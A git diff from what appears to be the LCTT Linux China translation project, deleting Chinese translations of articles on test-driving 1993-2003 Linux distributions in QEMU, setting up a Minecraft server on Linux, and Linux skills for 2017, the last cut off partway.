+[8]:http://www.nytimes.com/2015/08/19/technology/unicorns-hunt-for-talent-among-silicon-valleys-giants.html +[9]:http://blogs.wsj.com/cio/2016/09/30/tech-talent-war-moves-to-africa/ +[10]:https://devchat.tv/react-native-radio/08-bridging-react-native-components-with-tadeu-zagallo +[11]:https://facebook.github.io/react-native/ +[12]:https://medium.com/javascript-scene/native-apps-are-doomed-ac397148a2c0#.w06yd23ej +[13]:https://medium.com/u/c359511de780 +[14]:http://ben-evans.com/benedictevans/2016/12/8/mobile-is-eating-the-world +[15]:http://www.indeed.com/salary?q1=javascript+developer&l1=united+states&tm=1 +[16]:https://ionicframework.com/ +[17]:https://medium.com/lunabee-studio/why-hybrid-apps-are-crap-6f827a42f549#.lakqptjw6 +[18]:https://techcrunch.com/2012/09/11/mark-zuckerberg-our-biggest-mistake-with-mobile-was-betting-too-much-on-html5/ +[19]:https://www.nativescript.org/ +[20]:https://facebook.github.io/react-native/ +[21]:https://github.com/ptmt/react-native-macos +[22]:https://github.com/necolas/react-native-web +[23]:https://facebook.github.io/react/ +[24]:http://microsoft.github.io/code-push/ +[25]:https://apphub.io/ +[26]:https://github.com/elliottsj/apple-watch-uikit +[27]:https://github.com/douglowder/react-native-appletv +[28]:https://www.tizen.org/blogs/srsaul/2016/samsung-committed-bringing-react-native-tizen +[29]:http://angularjs.blogspot.com/2016/09/angular2-final.html +[30]:https://facebook.github.io/react-native/ +[31]:https://facebook.github.io/react-native/showcase.html +[32]:https://play.google.com/store/apps/details?id=com.facebook.adsmanager +[33]:https://itunes.apple.com/us/app/facebook-groups/id931735837?mt=8 +[34]:https://devchat.tv/react-native-radio/40-navigation-in-react-native-with-eric-vicenti +[35]:https://code.facebook.com/projects/ +[36]:https://medium.com/u/41a8b1601c59 +[37]:https://medium.com/u/71a78c1b069b +[38]:http://www.highsnobiety.com/2016/12/08/iphone-apps-best-of-the-year-2016/ +[39]:http://microsoft.github.io/code-push/ +[40]:https://github.com/Microsoft/vscode-react-native +[41]:https://github.com/ReactWindows/react-native-windows +[42]:https://twitter.com/dabit3 +[43]:http://reactnative.training/ diff --git a/translated/tech/20161220 How Linux got to be Linux Test driving 1993-2003 distros.md b/translated/tech/20161220 How Linux got to be Linux Test driving 1993-2003 distros.md deleted file mode 100644 index 0b395c4c37..0000000000 --- a/translated/tech/20161220 How Linux got to be Linux Test driving 1993-2003 distros.md +++ /dev/null @@ -1,246 +0,0 @@ -How Linux got to be Linux: Test driving 1993-2003 distros -============================================================ -Linux 系统的成长之路:试用 1993-2003 年之间的 Linux 老版本系统 - -### 让我们一起来回顾 Linux 早期版本的美好时光 - - ![How Linux got to be Linux: Test driving 1993-2003 distros](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/car-penguin-drive-linux-yellow.png?itok=ueZE5mph "How Linux got to be Linux: Test driving 1993-2003 distros") - -图片来源: - -互联网档案馆[书籍][7][图片][8]。 Opensource.com. CC BY-SA 4.0 编辑引用。 - -开源软件最擗独特性的一点就是它永远不会真正的走到 EOL (生命的终点)。它们的磁盘镜像文件大都可以在网上找到,并且使用它们也不需要经过任何授权,因此,我们可以返回去找到那些老版本的 Linux 系统,并在虚拟机中安装它们,这都是很容易做到的,通过回顾那些珍贵的系统画面,让我们来回顾 Linux 系统这么多年来所发生的翻天覆地的变化。 - -我们使用 Slackware 1.01 版本系统来开始这段旅程,该系统差不多 20 年以前就在 **comp.os.linux.announce** 新闻组中发布出来了。 - -### Slackware 1.01 版本系统 ( 1993 年) - - ![slackware 1.0 screenshot](https://opensource.com/sites/default/files/slack1.png "slackware 1.0 screenshot") - -Slackware 1.01 -使用 Slackware 1.01 系统最爽的是在 Qemu 模拟器软件 [2014 系列][9] 中有一个预先制作好的镜像文件,因此你可以不用手动去执行安装任务(这样美好的事情已经不存在了)。其引导启动命令如下: - -``` - $ qemu-kvm -m 16M -drive if=ide,format=qcow2,file=slackware.qcow2 \ - -netdev user,id=slirp -device ne2k_isa,netdev=slirp \ - -serial stdio -redir tcp:22122::22 -``` - -在 1993 年那个版本的 Linux 系统中,很多东西都跟我们所想像的一样。所有常用的基本命令,比如 'ls' 和 'cd' 命令的使用方式,以及所有的基本工具(`gawk` , `cut` , `diff` , `perl`,当然还有 [Volkerding][10] 最喜欢的 'elvis‘ 工具)现在都在使用,而且也包含在如今的 Linux 系统中,但是仍然有一小部分东西让我感到惊讶。当你尝试使用 tab 补全命令方式来列出上百个文件时, ’BASH' 会非常友好的提示用户确认,并且那些查看压缩文件的工具(比如 ‘zless' 和 ’zmore' 以及 'zcat')已经在使用了。很多方面都比我中要好得多,总之,该系统给人的感觉就是超级现代化。 - -不过,该系统没有软件包管理的相关概念。所有软件的安装和卸载都得手动完成,也不能查询出已安装的软件包。 - -总的来说, Slackware 1.01 系统感觉更像是一个非常现代化的 UNIX 系统,或者更恰当的是,它给人的感觉就是一个 Linux 用户在操作一个现代化的 UNIX 系统。很多东西都非常熟悉,但是也不尽相同。在 1993 年发布的操作系统中,并不是所有东西都跟你想像的一样。 - -### Debian 0.91 版本系统( 1994 年) - -为了尝试 Debian 0.91 版本系统,我使用的是 [Ibiblio 数字档案][11] 网站下载的软盘镜像文件,该系统一开始在 1994 年发布出来。启动命令如下: - -``` - $ gunzip bootdsk.gz basedsk1.gz basedsk2.gz - $ qemu-system-i386 -M pc -m 64 -boot order=ac,menu=on \ - -drive file=bootdisk,if=floppy,format=raw \ - -drive file=debian.raw,if=ide,format=raw \ - -device ne2k_isa,netdev=slirp \ - -serial msmouse -vga std \ - -redir tcp:22122::22 \ - -netdev user,id=slirp -``` - -从 Debian 0.91 的启动磁盘启动后进入到一个简洁的 shell 界面,有很清晰的提示信息告诉你下一步将要执行的操作。 - -安装过程进行得非常顺利。从磁盘分区,写入 ext2 文件系统到分区,到显示图形菜单操作界面要经过 7 个步骤,之后开始复制 'basedsk' 镜像文件。这里使用的是以最小化方式来安装 Debian 系统,跟大家在安装自己的 Linux 系统过程中的很多步骤都非常相似。 - -Debian 系统因其自身的包管理器而出名,但是在早期的版本中只是多一些提示功能而已。有 ‘dpkg' 命令,但它是一个基于交互式菜单的系统——一种看似很笨拙的‘雕虫小技’,有多个层次的可选菜单,并且自然地附带了几个可用软件包。 - -尽管如此,你也可以感受到其简便的设计理念。你只需下载三个软盘镜像文件,最后合成一个可启动的系统,然后就可以使用一个简单的文本菜单来安装更多的东西。我由衷的明白了为什么 Debain 系统如此受欢迎的原因。 - -### Jurix/S.u.S.E. 系统( 1996 年) - - ![Jurix install screen](https://opensource.com/sites/default/files/jurix_install.png "Jurix install screen") - -安装 Jurix 系统 - -Jurix 系统是 SUSE 系统的前身, Jurix 使用二进制的 '.tgz' 软件包组织到类似 Slackware 安装包结构的目录中,其安装包本身也跟 Slackware 的安装包很相似。 - -``` - $ qemu-system-i386 -M pc -m 1024 \ - -boot order=ac,menu=on \ - -drive \ - file=jurix/install,if=floppy,format=raw \ - -drive file=jurix.img,if=ide \ - -drive file=pkg.raw,if=ide,format=raw \ - -device ne2k_isa,netdev=slirp \ - -serial msmouse -vga std \ - -redir tcp:22122::22 \ - -netdev user,id=slirp -``` - - -因为我不是特意去寻找最早期的版本, Jurix 系统是找到的第一个’感觉‘十分像是打算给用户使用的有图形界面的 Linux 发行版。 [XFree86][12] 图形桌面环境已默认安装了,如果你不打算使用该工具,选择退出该环境即可。 - -比如 `/usr/lib/X11/XF86Config` (该文件变成 `Xorg.conf` )这个配置文件已经存在了,这让我在使用 GUI 前完成了 90% 的工作,但是我花费了一整个周末的时间来调试 `vsync` , `hsync` , 和 `ramdac` 界面颜色的过程中却不小心把 `Xorg.conf` 这个配置文件给覆盖了,最后我完全放弃了。 - -在 Jurix 系统上安装软件包也非常简单;找到源路径下的 '.tgz' 文件,然后运行一个常用的 ‘tar' 命令: ` $ su -c 'tar xzvf foo.tgz -C /'` 该软件包就会被解压到 root 分区,并准备好使用了。我刚开始的时候使用几个之前未用过的软件包来安装测试,发现操作也很简单、快速且非常可靠。 - -### SUSE 5.1 版本系统( 1998 年) - - ![suse install](https://opensource.com/sites/default/files/suse5fvwm.png "suse install") - -在 SuSE 5.1 系统上运行 FVWM 窗口管理器 - -我是使用 1998 年在 Maryland 一家软件商店里买的 InfoMagic CD-ROM 光驱来安装 SUSE 5.1 系统的。其引导启动命令如下: - -``` - $ qemu-system-i386 -M pc-0.10 -m 64 \ - -boot order=ad,menu=on \ - -drive file=floppy.raw,if=floppy,format=raw \ - -cdrom /dev/sr0 \ - -drive file=suse5.raw,if=ide,format=raw \ - -vga cirrus -serial msmouse -``` - -安装过程相对于前边几次来说要复杂得多。 YasT 工具在软盘和 CD-ROM 光驱之间阻止了配置文件的生成和设置,还需要重启好多次,在重启了好几次后我才反应过来是我操作顺序不当导致的问题。在安装过程中,我就规犯了两次同样的错,我只是习惯了 YasT 工具的安装方式,到第三次才顺利的安装成功,这对于一个 Linux 用户将来的成长来说是一个很大的教训及经验。 - -我使用 SUSE 5.1 的主要目的就是体验其 GUI 桌面环境。配置的过程已经很熟悉了,使用几个漂亮的图形界面工具(包括一个很好用的 `XF86Setup` 前端界面配置工具)来测试和调试鼠标及显示器问题。我用了一个小时不到的时间就调试好 GUI 界面,并正常运行起来,其中大部分时间是耽搁在查询 Qemu 工具可以处理哪种颜色方案的虚拟显卡。 - -可选用的桌面环境包括  `fvwm` , `fvwm2` 和 `ctwm`。我使用的是 ’fvwm' ,并且运行得也正常。我发现 `tkDesk` 这个文件管理器组合包跟 Ubuntu 系统 `Unity` 的启动栏非常的相似。 - -使用该系统总的来说还是非常令人愉快的,一旦成功安装了桌面环境并正常运行起来, SUSE 5.1 可以说是取得了令人瞩目的成功。 - -### Red Hat 6.0 版本系统( 1999 年) - - ![Red Hat 1999](https://opensource.com/sites/default/files/redhat6_gimp_0.png "Red Hat 1999") - -在 Red Hat 6 系统上运行 GIMP 1.x 图像处理程序 - -下一个系统 Red Hat 6.0 安装盘我刚好家里有。不是 RHEL 6.0 —— 而是 Red Hat 6.0 。,这是一个在 RHEL 或 Fedora 系统出现之前商店里就有卖的桌面版系统。这个安装盘是是我在 1999 年 6 月份买的。 -其引导启动命令如下: - -``` - $ qemu-system-i386 -M pc-0.10 -m 512 \ - -boot order=ad,menu=on \ - -drive file=redhat6.raw,if=ide,format=raw \ - -serial msmouse -netdev user,id=slirp \ - -vga cirrus -cdrom /dev/sr0 -``` - -整个安装过程由系统引导安装,并且速度非常快。无论是选择什么系统安装包(按 **工作站**, **服务器**, 及 **自定义** 进行分组 ),磁盘分区,或者是启动安装,你都没必要离开安装过程的安全模式。 - -Red Hat 6 包括一个 `xf86config` 应用程序来一步步指导你完成 X 配置工作,尽管它有一些很奇怪的模拟鼠标的选项,但是之后 X 宣称这没啥意义。它比手动修改 Xf86Config 配置文件要容易得多,但是要正确无误的配置好 X 环境也不是一个简单的工作。 - -Red Hat 6 绑定的桌面环境还是 GNOME ,但是这个窗口管理器只是一个早期的 [雏形][13] ,它同样也提供了主要的声卡服务进程。`Xdm` 和 `gdm` 也作为登录管理器包含在其中,因此普通用户没有权限也可以登录到系统中并启动或者关闭 X 桌面进程,这在多用户系统中是非常重要的。 - -它不包含一些主要的应用程序;也没有 'gedit' 工具,没有重要的统一办公应用程序,更没有软件包管理器。有 ‘GnoRPM' 工具,这是一个图形界面的 RPM 包管理工具,用于查看及删除软件包,这个工具跟 ’yum' 或 ’PackageKit‘ 工具非常类似,还有基于图形界面的文件编辑器 ’gnotepad+‘ (尽管没有 Emacs 工具)。 - -总的来说,桌面环境在使用上也是非常直观的。跟后边实现的 GNOME 桌面环境不同,这个早期版本的在屏幕底部一有个面板,其中有一个应用程序菜单和启动图标,在中间位置有个虚拟桌面控制器。我无法想象其它操作系统的用户在使用这个桌面环境时会有多么的不习惯。 - -Red Hat 6 对于 Linux 系统来说是一个巨大的进步,很明显 Linux 系统正向着成为一个适用的桌面系统方向发展。 - -### Mandrake 8.0 版本系统( 2001 年) - - ![Mandrake 8.0 installer](https://opensource.com/sites/default/files/mandrake8.png "Mandrake 8.0 installer") - -Mandrake: Linux 系统的一个转折点 - -Mandrake 8.0 于 2001 年发布,这已经可以跟 Apple OS 9.2 和 Windows ME 系统相提并论了。 - -我反而觉得老版本的系统才更安全一些。 - -其引导启动命令如下: -``` - $ qemu-system-i386 \ - -M pc-0.10 -m 2048 \ - -boot order=ad,menu=on \ - -drive file=mandrake8.qcow2 \ - -usb -net nic,model=rtl8139 \ - -netdev user,id=slirp \ - -vga cirrus \ - -cdrom mandrake-8.0-i386.iso -``` - -我一直觉得 Red Hat 系统的安装过程非常棒了,但是 Mandrake 的安装过程更是让人喜出望外。它非常友好,并且在继续下一步之前还给用户一个测试配置文件的机会,易用高效,使用起来非常令人惊奇。我也不用导入自己的 `XF86Config` 配置文件,因为 Mandrake 的安装程序会自动完成该任务。 - - ![Mandrake install](https://opensource.com/sites/default/files/mandrake8install_new.png "Mandrake install") - -Mandrake 8.0 系统的安装程序 - -实际上,使用 Mandrake 系统跟使用其它已安装了桌面环境系统的感受基本相同。让我很惊奇是的它们在操作体验上如此的相似。我相信,即使这个时候我在使用 Mandrake 系统的过程中遇到一些问题,以我自己的技术能力甚至是一个技术水平一般的年轻人也很容易解决。它的界面非常直观,帮助文档也很有用,并且软件包管理起来也很容易,只是那个时候人们还不习惯直接到网上下载他们需要的任何软件包来安装。 - -### Fedora 1 版本系统( 2003 年) - - ![Fedora Core install](https://opensource.com/sites/default/files/fedora1.png "Fedora Core install") - -基于 Red Hat 的 Fedora 系统 - -新 Fedora Core 版本系统于 2003 年发布。 Fedora Core 基于 Red Hat 系统,它的主要目的是在 Red Hat 企业版( RHEL )成为该公司旗舰产品之前继续带动 Linux 桌面版系统的发展。 - - -启动老版本的 Fedora COre 1 系统也没啥特别的地方: - -``` - $ qemu-system-i386 -M pc \ - -m 2048 -boot order=ac,menu=on \ - -drive file=fedora1.qcow2 -usb \ - -net nic,model='rtl8139' -netdev user \ - -vga cirrus -cdrom fedora-1-i386-cd1.iso -``` - -安装 Fedora Core 同样简单容易; Fedora 和 Red Hat 系统在之后的 9 年中使用同样的安装包。它同样使用简单易用的图形化界面。 - - ![Fedora Anaconda](https://opensource.com/sites/default/files/fedora1anaconda.png "Fedora Anaconda") -Anaconda GUI 界面 - -使用 Fedora Core 系统的体验跟 Red Hat 6 或 7 版本没多少区别。 GNOME 图形界面很漂亮,有各种独立的配置程序助手,并且界面展示都非常的整洁和专业。 - -桌面上的 Start Here 图标指导用户前往三个位置:应用程序目录,首选项面板和系统设置。 一个红帽的图标表示应用程序菜单,而下边的 GNOME 面板里包括所有最新的 Linux 应用程序启动器,包括 OpenOffice 办公组件和 mozilla 浏览器。 - -### 展望未来 - -在 2000 左右, Linux 系统已经发展得很好并取得了巨大的进步。桌面环境前所未有的更加精致美观,有各种可用的应用程序,安装过程比其它操作操作更简易更高效。事实上,从 2000 年以来,用户和系统之间的关系更加紧密,即使到现在也没发生根本上的改变。当然还有一些更新和改善,以及数量惊人的创新方面的变化。 - -让我们来了解一下各个 Linux 系统项目上的演变: - -* Mandrake 系统后来更名为 Mandriva,如今为 [Mageia][1] ; -* Fedora Core 随后改为 [Fedora][2] ; -* [Ubuntu][3] 脱胎于 [Debian][4] 并且,它让 “Linux" 成为一个家喻户晓的词汇; -* Valve 公司开发的 [SteamOS][5] 成为其官方游戏平台; -* [Slackware][6] 现如今仍在平稳发展。 - -无论你是一个 Linux 新手,还是一个技术精湛的 Linux 老用户,上面的大多数截图都构成了让 Linux 系统被记入历史的一本传记。很高兴今天我们能够回顾成为世界上最大的开源项目之一的 Linux 系统是如何发展壮大起来的。更重要的是,每一次想到自己也是 Linux 开源世界中的一员我们就无比激动,把握现在,展望未来。 - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/penguinmedallion200x200.png?itok=ROQSR50J) - -Seth Kenlon —— Seth Kenlon 是一位独立多媒体艺术家,开源文化倡导者, Unix 极客。他还是 Slackware 多媒体产品项目的维护人员之一,官网:http://slackermedia.ml 。 - - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/16/12/yearbook-linux-test-driving-distros - -作者:[Seth Kenlon][a] -译者:[rusking](https://github.com/rusking) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/seth -[1]:http://mageia.org/ -[2]:http://fedoraproject.org/ -[3]:http://ubuntu.com/ -[4]:http://debian.org/ -[5]:http://store.steampowered.com/steamos -[6]:http://slackware.com/ -[7]:https://www.flickr.com/photos/internetarchivebookimages/14746482994/in/photolist-ot6zCN-odgbDq-orm48o-otifuv-otdyWa-ouDjnZ-otGT2L-odYVqY-otmff7-otGamG-otnmSg-rxnhoq-orTmKf-otUn6k-otBg1e-Gm6FEf-x4Fh64-otUcGR-wcXsxg-tLTN9R-otrWYV-otnyUE-iaaBKz-ovcPPi-ovokCg-ov4pwM-x8Tdf1-hT5mYr-otb75b-8Zk6XR-vtefQ7-vtehjQ-xhhN9r-vdXhWm-xFBgtQ-vdXdJU-vvTH6R-uyG5rH-vuZChC-xhhGii-vvU5Uv-vvTNpB-vvxqsV-xyN2Ai-vdXcFw-vdXuNC-wBMhes-xxYmxu-vdXxwS-vvU8Zt -[8]:https://www.flickr.com/photos/internetarchivebookimages/14774719031/in/photolist-ovAie2-otPK99-xtDX7p-tmxqWf-ow3i43-odd68o-xUPaxW-yHCtWi-wZVsrD-DExW5g-BrzB7b-CmMpC9-oy4hyF-x3UDWA-ow1m4A-x1ij7w-tBdz9a-tQMoRm-wn3tdw-oegTJz-owgrs2-rtpeX1-vNN6g9-owemNT-x3o3pX-wiJyEs-CGCC4W-owg22q-oeT71w-w6PRMn-Ds8gyR-x2Aodm-owoJQm-owtGp9-qVxppC-xM3Gw7-owgV5J-ou9WEs-wihHtF-CRmosE-uk9vB3-wiKdW6-oeGKq3-oeFS4f-x5AZtd-w6PNuv-xgkofr-wZx1gJ-EaYPED-oxCbFP -[9]:http://www.qemu-advent-calendar.org/2014 -[10]:http://www.slackware.com/~volkerdi/ -[11]:https://ibiblio.org/pub/historic-linux/distributions/debian-0.91/debian-0.91/dist -[12]:http://www.xfree86.org/ -[13]:http://enlightenment.org/ -[^]: \ No newline at end of file diff --git a/translated/tech/20161225 Minecraft Server on Linux.md b/translated/tech/20161225 Minecraft Server on Linux.md deleted file mode 100644 index 664664eca9..0000000000 --- a/translated/tech/20161225 Minecraft Server on Linux.md +++ /dev/null @@ -1,149 +0,0 @@ -# Linux 上搭建 Minecraft 服务器 - - -![Title.jpg](https://www.linuxforum.com/attachments/title-jpg.89/) - -“我的世界”是一个在不同的控制器和计算机系统存在较多玩家的游戏。 截至2016年6月,在所有平台上已经超过 10亿6千万在所有平台上售卖。因为它受欢迎,你可能想在家里举办一个 Minecraft 派对。为此,你(需要)安装一个 “我的世界” 服务器去允许所有用户连接在同一个世界中一起玩 - -**系统要求** - -为了玩耍,你需要一个 Linux 操作系统有相当数量 RAM (译者:就是 “RW内存条”,这游戏内存要求高)更多的玩家你将需要更多的 RAM 在服务器上。硬件设备空间不是需求很大,只要足够去安装 Java 以及 ”我的世界“ 服务器 Java 文件。无论有线或无线网络,Minecraft服务器应该有一个体面的网络连接。 - -让我们看看 ”我的世界“ 服务器最低要求: - -**CPU: **双核或更好 - -**RAM:** 2 GB ( 20-40 用户量 ), 3 GB ( 30-60 用户量 ), 8 GB ( 60+ 用户量 ) -**OS:** 没有图形化用户接口(GUI)去允许更多资源空闲。 - -**NOTE:** ”我的世界“ 针对服务端程序而不是一个完整的操作系统!如果资源较多可以分配到 Minecraft 服务器,它将变得更易操作。 - -**安装 Java ** - -Linux 操作系统首次运行,需要你去安装最新版本的 Java 程序。 - -为了验证你的 Java 版本,位于终端输入以下命令:”java -version“。结果应该是: - -``` -java version "1.8.0_101" - -Java(TM) SE Runtime Environment (build 1.8.0_101-b13) - -Java HotSpot(TM) Client VM (build 25.101-b13, mixed mode) -``` - -如果你的 Java 版本正确不是 1.8 或者更高,则通过在Ubuntu系统上的终端执行以下操作来安装Java版本8: - -1. _sudo add-apt-repository ppa:webupd8team/java_ -2. _sudo apt-get update_ -3. sudo apt-get install oracle-java8-*installer* - -**NOTE:**如果 'add-apt-repository' 命令无法找到,运行'sudo apt-get install software-properties-common'。 您还可以将第三个命令更改为最新版本的 'oracle-java9-installer' java 版本。 - -对于 Redhat 系统(如 CentOS),请使用以下命令: - -1. _sudo yum install java-1.8.0-openjdk_ - -安装后,核实键入版本命令, 'java-version' , 并且核实输出。这样你就有了一个适当的 Java 版本,你可以继续前进接下去的安装。 - -**Minecraft 服务器版本下载** - -接下来做的事就是去检查用户将运行的 Minecraft 的版本。图1 显示一个系统运行 ”我的世界“ 并注意左下角的版本号。 - -![Figure 01.jpg](https://www.linuxforum.com/attachments/figure-01-jpg.85/) - -**图 1** - -请记住”我的世界“客户端版本号。每个客户端应该是相同的版本去完成这项工作。 - -您接下来要做的是下载,客户端需要的 Minecraft 服务器的版本。为了下载版本你需要知道它的位置。命令得到需要的文件是: - -_sudo wget _[_https://s3.amazonaws.com/Minecraft.Download/versions/[version]/minecraft_server.[version].jar_][1] - -在图1看到,版本号是 1.10.2。那么这个命令就该变成: - -_sudo wget _[_https://s3.amazonaws.com/Minecraft.Download/versions/1.10.2/minecraft_server.1.10.2.jar_][2] - -当你下载文件,使用命令它可以保存到正确的目录。为了确定正确位置用命令 'pwd' - -一旦你有了文件,知道它已被保存的文件夹就可以继续了。 - -**服务器信息** - -在启动 Minecraft 服务器之前,您必须知道当前系统上可用 RAM 的大小以及能被使用的内存。 当启动 Minecraft 服务器时,您将指定 RAM 的初始值和最大值的 RAM,以供更多玩家加入。 再次重要的是有足够的 RAM 。 如果可以,使用最小安装操作系统(OS),例如最小安装 Ubuntu 以获得更多 RAM 。 - -一旦你有你需要的 Minecraft 服务器文件,就可以确定分配给 Minecraft 的 RAM 的数量。 要确定可用RAM打开一个终端并键入以下命令 ,一个示例输出如 图 2 所示: - -_free -h_ - -![Figure 02.jpg](https://camo.githubusercontent.com/686cb2c9421f276e1cab0b08b713f636ed3ca614/68747470733a2f2f7777772e6c696e7578666f72756d2e636f6d2f6174746163686d656e74732f6669677572652d30322d6a70672e38362f) - -**图 2** - -如图2所示,在这个低端系统上,立你可以看到那只有 684 MB 空余 RAM。这不是一个满足要求的系统去搭建一个 “我的世界” 服务器。在另一个服务器我有 2.8G(内存)可供给 “我的世界” 用。 - -在我们启动服务器之前,我们需要找到服务器的IP地址。 为此,请运行命令'ifconfig'。 如图3所示,应该有一个网络连接的列表,显示一个Internet地址或'inet addr',它是'192.168.0.2'。 在我的服务器系统上,它列出了地址“192.168.0.14”,这是将从客户端系统使用的地址。 - - ![Figure 03.jpg](https://camo.githubusercontent.com/62dc2bfe97f8df7895d606c594d74f27b4881ee4/68747470733a2f2f7777772e6c696e7578666f72756d2e636f6d2f6174746163686d656e74732f6669677572652d30332d6a70672e38372f) - -**图 3** - -**搭建 Minecraft 服务器** - -下一步才是真正的开始 ”我的世界“ 服务器。事实上在开始前,有几个项目要修改(覆盖?)。 当启动“我的世界”服务器,指定为 Minecraft 初始化多少内存。 您还将指定使用的最大内存。 - -如果我的系统有 3.7GB 闲置内存,我便知道将有小于 40 位玩家(可以游戏),于是我只需要划出 2GB。当然,我可以增加些(内存)以允许用户增长。如果(系统)需要,我还想留一点内存给系统(运行)。(说干就干,)我将最小值设置为 2 GB,最大值设置为 3 GB。 由于最大值设置为 3 GB,可以保留(除去?)系统需要的 700 MB RAM,但这只有当 Minecraft 服务器使用超过最初的2 GB。(译者注:作者的意思是说,3.7GB内存,划分2GB给40位游戏玩家。玩家最多是把 3GB 全用掉。但即便 3GB 全部用掉,系统还有 700MB 可以运行,事实上系统远远不止 700MB 可用) - -启动服务器的命令行是: - -_sudo java -Xms# -Xmx# -jar [path]/minecraft_server.[version].jar nogui_ - -现在命令结构的细分: - --Xms# - 初始启动 RAM (-Xms2048m) --Xmx# - 最大 RAM 数 (-Xmx3096m) -[path] – “我的世界” 服务器文件路径 (/home/tux/MCS/) -[version] – “我的世界” 服务器下载版本 (1.10.2) -nogui – 用于显示基于文本界面去帮助缩小 RAM 使用。如果你使用GUI(用户图形化接口),那么移除 *nogui* 选项。 - -一个系统使用 2GB 内存 以及 最大 3GB 位置为 '/home/tux/MCS' 版本号为 ‘1.10.2' 的命令完整实例将变成: - -_sudo java -Xms2048m -Xmx3096m -jar /home/tux/MCS/minecraft_server.1.10.2.jar nogui_ - -**NOTE:** 这 RAM 容量大小是兆字节单位。使容量以 1024 增加。举个例子,2GB 的 RAM 使 2 与 1024 相乘为容量 2048 . 但别忘小写字母 “m” 是特殊兆字节。你可以使用特殊简易的 '2g‘ 和 ’3g‘ 代替 2GB 和 3GB - -在你首次运行服务器(时)会发成一些错误。开始之前,它申明 “最终用户许可协议” 必须被同意。 - -为了同意 “最终用户许可协议” 你需要进行编辑位于同样文件夹的 “Minecraft” 服务器 JAR 文件的 “eula.txt” 文件。 - -使用一个比如 “nano” 的文件编辑器打开文件 'eula.txt' 文件。确定你进行这步使用的是 root 权限。将行“eula = false”更改为“eula = true”并保存文件。 - -现在,再次输入命令以启动服务器。 屏幕完整信息应该通过,然后走一段进度,说明它正在准备加载世界。 进度将计数高达100%,因为它创建的初始世界。 有关系统时间更改的任何错误消息是正常的,因此忽略它们。 - -在这个方面你可以打开客户端程序并且看到如上 图1。点击 “多人” 按钮。再下面的屏幕,图4,选择 “直接连接”。将提示您输入服务器地址,因此键入Minecraft服务器的IP地址。你现在应该可以连接游戏了。 - - - ![Figure 04.jpg](https://camo.githubusercontent.com/6893151530092ac59b7b04d17ca5bc07d9bfc9b4/68747470733a2f2f7777772e6c696e7578666f72756d2e636f6d2f6174746163686d656e74732f6669677572652d30342d6a70672e38382f) - -**图 4** - -**连接的某些麻烦** - -如果一些客户端无法连接到服务器,那么你需要按下 “CTRL+Z” 退出 Java 程序。打开文件 “server.propertices” 使用一个像nano的编辑器。记住要root(权限)编辑“在线模式”行...它应该被改变为了 “true” ,改变这个文件为 “false” 并保存。重启服务器并打开 Minecraft 服务器。客户端重新连接服务器并且一切都开始工作。 - -快乐挖掘! - ------- - -via: https://www.linuxforum.com/threads/minecraft-server-on-linux.3202/ - -作者:[Jarret][a] -译者:[erlinux](http://www.itxdm.me) - -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: https://www.linuxforum.com/members/jarret.268/ -[1]: https://s3.amazonaws.com/Minecraft.Download/versions/%5Bversion%5D/minecraft_server.%5Bversion%5D.jar -[2]: https://s3.amazonaws.com/Minecraft.Download/versions/%5Bversion%5D/minecraft_server.%5Bversion%5D.jar diff --git a/translated/tech/20170103 4 hot skills for Linux pros in 2017.md b/translated/tech/20170103 4 hot skills for Linux pros in 2017.md deleted file mode 100644 index 9ffca45289..0000000000 --- a/translated/tech/20170103 4 hot skills for Linux pros in 2017.md +++ /dev/null @@ -1,62 +0,0 @@ -2017 年 4 个 Linux 热门技能 -============================================================ - -### 你在新的一年里需要刷哪些技能? - - ![4 hot skills for Linux pros in 2017](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/lightbulb-idea-think-yearbook-lead.png?itok=56ovNk8n "4 hot skills for Linux pros in 2017") - -图片提供:[Internet Archive Book Images][1]。由 Opensource.com 修改。 CC BY-SA 4.0 - -成为 Linux 专家的一个问题是专家定义在不断变化。当我进入 Linux 世界的时候,要被认为是一个 _Linux 专家_,你需要能够编译自己的内核。天啊,如果你想在笔记本电脑上使用 Linux,即便你只是_用户_,你也必须编译一个自定义内核。 如今编译自己的内核通常是浪费时间。这不是说它并不重要,但在开源世界,我们建立在他人的成功基础之上,而 Linux 发行版为我们提供了运行良好的内核。虽然不总是那么剧烈变化,但对 IT 专业人员的需求每年都在变化。 - -下面是 2017 年 Linux 专业人员的四个重要技能: - -### 1\. 安全 - -我不是在讨论安全专家或安全顾问。这些职位和服务当然很重要,但是随着连接的设备渗透到我们生活的每一个方面,我们需要在我们做出的每一个决定中有[安全][2]意识。今年,我的妻子和我买了一台洗衣机和一台冰箱,它们都配备了蓝牙。黑客攻入我的漂洗系统的想法可能看起来很傻,但这都是潜在的攻击点。 - -当激活工作、家庭或我们的口袋中的任何系统时,我们应该考虑它们可能引发的安全问题。而且因为像联网烤面包机这样的物品不太可能及时获得固件升级,我们需要按照平凡的设备可能遭到破坏的思路来设计其余的系统。相比以前任何时候,我们更需要考虑来自防火墙内的攻击。不要让你的文件服务器被你的搅拌器破坏! - -### 2\. DevOps - -[DevOps][3] 不再是一个新概念。在过去两三年里,我们一直鼓励员工学习 DevOps,以便他们能够在员工队伍中取得成功。这是个好建议,但这并不意味着我们应该完全依赖自动化工具来完成我们的工作。Chef、Puppet、Ansible、Salt Stack 及类似的工具是美好的,但我们需要了解背后发生了什么,所以当发生一些不可避免的错误,我们应该知道如何解决它。 - -使用 DevOps 的程序方法来计算,我们仍然需要能够维护、修复和理解在代码层下运行的系统的人。没有 Linux 专家,云计算将是一个可怕的地方,即使那个云在你自己的机房里。 - -### 3\. 开发 - -作为系统管理员,20 年来,我从来没有时间学习编程。这听起来可能是一个借口,但这是事实。我所有的开发技能就是基本的脚本编写,以帮助我更快工作。不过,那些日子已经结束了。虽然我们需要在 DevOps 世界中拥有系统管理技能,但我们还需要系统管理员拥有编程技能。 - -如果你是一个像我一样的老练的系统管理员,你可能已经采用 DevOps 